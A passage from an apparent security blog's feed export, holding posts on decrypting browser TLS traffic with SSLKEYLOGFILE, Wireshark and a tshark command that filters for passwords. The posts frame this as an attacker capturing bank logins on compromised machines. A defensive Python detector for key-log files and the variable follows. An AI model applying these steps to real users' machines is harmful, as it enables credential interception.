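        if len(KEY_VALUE.findall(path)) >= 2:
            reasons.append("multiple key=value pairs in URL path")
        if reasons:
            findings.append({
                "client": m["client"],
                "user": m["user"],
                "time": m["ts"],
                "host": url.hostname,
                "decoded_path": path,
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_proxy_log(SAMPLE_LOG):
        print(finding)
```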
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-17506150488241900432016-04-15T05:08:00.000-07:002016-04-15T05:08:04.444-07:00Decrypting SSL traffic via tshark<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi,<br />
<br />
Just a thought: what if we get domain access, can access any machine within the network and further eavesdrop on SSL connections on multiple machines? One step ahead, send the data to the attacker!<br />
<br />
tshark -n -r ssl.pcapng -o http.ssl.port:443,4430-4433 -o ssl.keylog_file:sslkeylog.log -Y ssl -V -Y "http.request" | find "pass"<br />
<br />
<br />
<ol style="text-align: left;">
<li>"ssl.pcapng" is our pcap dump file</li>
<li>"sslkeylog.log" is our pre-master secret file containing the SSL keys generated by the browser</li>
<li>"-o" is used to change the preference settings for the SSL protocol so that the SSL keys are read from the log file.</li>
</ol>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-oVZpDth2fREe0DIDQR1X6XDePibxhlEbO0gVdpniHEchZfC4NbIfeLOq4XVeO9yILzdNGaH81XonsleVn2RXKgxNhttN_3kXQ5FfKMriEG2EJsLVEmzGtoLhFtt5_f9pS90QvZM6UNrR/s1600/ssl_5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-oVZpDth2fREe0DIDQR1X6XDePibxhlEbO0gVdpniHEchZfC4NbIfeLOq4XVeO9yILzdNGaH81XonsleVn2RXKgxNhttN_3kXQ5FfKMriEG2EJsLVEmzGtoLhFtt5_f9pS90QvZM6UNrR/s400/ssl_5.png" width="400" /></a></div>
<br />
Hope this helps!</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-53710422071731202882016-04-15T04:27:00.001-07:002016-04-15T04:27:52.487-07:00Decrypt SSL Traffic<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Hi. Consider a scenario where an attacker has access to client machines and wants to further intercept SSL traffic to extract maybe a bank username, password or anything else sent over SSL!</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Well, the first thing the attacker needs to do is enable logging of SSL keys!</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
How can you log SSL keys in a log file?</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
By default, the Chrome and Firefox browsers have the capability to export SSL keys, provided you point your browsers to the flat log file location. So how can you point your browsers to log all keys into the log file?</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
For this you need to follow the steps below:</div>
<div style="text-align: left;">
<br /></div>
<ol style="text-align: left;">
<li>Create user environment "Variable name" = SSLKEYLOGFILE<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-uS1Tqgqly3OKzgk9mTo61VUtXbbjzaI9Cf_0skjPv3XkgtWxDDf8YjoYbUiM4gJM38wPpU33uunhkFV2uRMXHa6knUAP_J7Vn9Eat7JPuf7nuRAHR2CI5tDqzfLz7nU7cFIh6ikXHiew/s1600/ssl_1.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-left: 1em; text-align: center;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-uS1Tqgqly3OKzgk9mTo61VUtXbbjzaI9Cf_0skjPv3XkgtWxDDf8YjoYbUiM4gJM38wPpU33uunhkFV2uRMXHa6knUAP_J7Vn9Eat7JPuf7nuRAHR2CI5tDqzfLz7nU7cFIh6ikXHiew/s400/ssl_1.png" width="400" /></a></li>
<li>Set the "Variable value" = Path of log file where you want to save SSL logs</li>
<li>Ex. Variable value = C:\users\admin\ssllog.log</li>
<li>Create blank file on above specified path "c:\users\admin" with same name "ssllog.log" </li>
<li>That's it!....</li>
<li>Start browsing any SSL enabled websites Ex. https://www.yahoo.com</li>
<li>You will see that browser has started depositing SSL key data in your "ssllog.log" file<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7yew0UCN8t0ZdB-LvbxHWJd2Gb3Fk7J58mQrDwL8DXQ98yBNUIRL0FmvNeLMvlxk0GDVvEXTGGhGKcXO3yxlxEBpdEUaFNKWNGDlIewTZIMd19JJVieOE0fOshv0caj7NvnsJd6y0tw5I/s1600/ssl_2.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7yew0UCN8t0ZdB-LvbxHWJd2Gb3Fk7J58mQrDwL8DXQ98yBNUIRL0FmvNeLMvlxk0GDVvEXTGGhGKcXO3yxlxEBpdEUaFNKWNGDlIewTZIMd19JJVieOE0fOshv0caj7NvnsJd6y0tw5I/s400/ssl_2.png" width="400" /></a></li>
<li>Now it's just a matter of time before you decrypt the traffic using Wireshark</li>
<li>Open your Wireshark instance</li>
<li>Go to Edit > Preferences > Protocols > Select SSL and add the location of "ssllog.log" file<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvIxqaYsHvvevKB6nQzBwzFRD-pcMAW77m0OedapJ2hi0lk0dpFW29qx5h45FH0dzmbqM1gWR4BZQETu3JQpYIb9ngMNYkp86Ctvr2leOL8xPIw-zioqrjNCw2FXsl84fZxoOmtGQcZpvQ/s1600/ssl_3.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvIxqaYsHvvevKB6nQzBwzFRD-pcMAW77m0OedapJ2hi0lk0dpFW29qx5h45FH0dzmbqM1gWR4BZQETu3JQpYIb9ngMNYkp86Ctvr2leOL8xPIw-zioqrjNCw2FXsl84fZxoOmtGQcZpvQ/s400/ssl_3.png" width="400" /></a></li>
<li>Now you are all set to decrypt the SSL traffic of websites being visited in the browser!</li>
<li>Let's open https://yahoo.com and log in with your username and password</li>
<li>You can see that the traffic has been decrypted by Wireshark, and we can clearly see usernames and passwords in plain text!</li>
</ol>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIqZGV-drLiuoP2LoSxb9yp0LUnpXJsuNqHRZuTkXTkXFqWtwkHFTxxf3iv9FWUFr4rXZvEvt109kvWUCH58nNfUN1KNKYhzyQ17kBV1hHPDEBHy9Dlu_PgGVOoFUp-uhoTQ7_3IiXOJ3d/s1600/ssl_4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"> <img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIqZGV-drLiuoP2LoSxb9yp0LUnpXJsuNqHRZuTkXTkXFqWtwkHFTxxf3iv9FWUFr4rXZvEvt109kvWUCH58nNfUN1KNKYhzyQ17kBV1hHPDEBHy9Dlu_PgGVOoFUp-uhoTQ7_3IiXOJ3d/s400/ssl_4.png" width="400" /></a></div>
<div>
<br /></div>
<div>
That's it, we have successfully decrypted SSL traffic. Although it's an older technique, it is still effective.</div>
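<div>
For defenders, both this post and the tshark post above depend on two artefacts that can be hunted for: the SSLKEYLOGFILE variable and a file in the NSS key log format. The Python below is an added example, not code from the original posts: it reports whether the variable is set and recognises key log content. It goes beyond the posts by also accepting the TLS 1.3 labels of the same format; the sample lines use constructed placeholder hex.</div>

```python
import os
import re
from collections import Counter

_HEX = r"[0-9a-fA-F]"
LINE_PATTERNS = {
    # RSA <first 8 bytes of encrypted pre-master secret> <48-byte pre-master secret>
    "RSA": re.compile(rf"^RSA {_HEX}{{16}} {_HEX}{{96}}$"),
    # CLIENT_RANDOM <32-byte client random> <48-byte master secret>
    "CLIENT_RANDOM": re.compile(rf"^CLIENT_RANDOM {_HEX}{{64}} {_HEX}{{96}}$"),
}
# TLS 1.3 lines: <label> <32-byte client random> <secret of 32 or 48 bytes>
for _label in ("CLIENT_EARLY_TRAFFIC_SECRET", "CLIENT_HANDSHAKE_TRAFFIC_SECRET",
               "SERVER_HANDSHAKE_TRAFFIC_SECRET", "CLIENT_TRAFFIC_SECRET_0",
               "SERVER_TRAFFIC_SECRET_0", "EARLY_EXPORTER_SECRET",
               "EXPORTER_SECRET"):
    LINE_PATTERNS[_label] = re.compile(
        rf"^{_label} {_HEX}{{64}} (?:{_HEX}{{64}}|{_HEX}{{96}})$"
    )

# Constructed sample with placeholder hex (not real secrets).
SAMPLE_KEYLOG = "\n".join([
    "# SSL/TLS secrets log file, generated by NSS",
    "CLIENT_RANDOM " + "11" * 32 + " " + "22" * 48,
    "RSA " + "33" * 8 + " " + "44" * 48,
    "CLIENT_TRAFFIC_SECRET_0 " + "55" * 32 + " " + "66" * 32,
    "CLIENT_RANDOM " + "77" * 32 + " " + "88" * 10,  # truncated secret: invalid
])


def classify_keylog_text(text):
    """Count valid and invalid key log lines; '#' comments and blanks are ignored."""
    labels, invalid = Counter(), 0
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        pattern = LINE_PATTERNS.get(line.split(" ", 1)[0])
        if pattern and pattern.match(line):
            labels[line.split(" ", 1)[0]] += 1
        else:
            invalid += 1
    return {"valid": sum(labels.values()), "invalid": invalid,
            "labels": dict(labels)}


def looks_like_keylog(text, min_valid=1):
    """True when key log lines are present and outnumber unparseable lines."""
    stats = classify_keylog_text(text)
    return stats["valid"] >= min_valid and stats["valid"] > stats["invalid"]


def keylog_env_setting(environ=None):
    """Return the SSLKEYLOGFILE value from an environment mapping, or None.

    The name is matched case-insensitively, as Windows treats variable names.
    """
    environ = os.environ if environ is None else environ
    for name, value in environ.items():
        if name.upper() == "SSLKEYLOGFILE" and value.strip():
            return value
    return None


if __name__ == "__main__":
    print("SSLKEYLOGFILE in this session:", keylog_env_setting())
    print("Sample statistics:", classify_keylog_text(SAMPLE_KEYLOG))
```

<div>
Run keylog_env_setting() in the user's session to see whether the variable from step 1 is set, and looks_like_keylog() over the contents of candidate files such as the "ssllog.log" path from step 3.</div>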
<div>
<br /></div>
</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-32816876465421490912016-03-18T22:23:00.002-07:002016-03-18T22:25:59.221-07:00Amazing Download and upload Speed from Amazon EC2 instance<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Amazing Download and upload Speed from Amazon EC2 instance!!<br />
<br />
<img alt="Image result for amazon ec2 black" src="data:image/jpeg;base64,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" /><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHXvOGbaQXvrK8y1o7v8hJnTZK-vYclVGYQINcCUss4xC5IQdC2eLFcwqhsNWjZQNWzHuCaLhP5CcQ527mPFrRM5TM22vLx3cGRdeUqKqJ-guttiaENpwSxDQBqr9nQSUIU177Ic6KQ_w5/s1600/bandwidth_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHXvOGbaQXvrK8y1o7v8hJnTZK-vYclVGYQINcCUss4xC5IQdC2eLFcwqhsNWjZQNWzHuCaLhP5CcQ527mPFrRM5TM22vLx3cGRdeUqKqJ-guttiaENpwSxDQBqr9nQSUIU177Ic6KQ_w5/s400/bandwidth_1.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
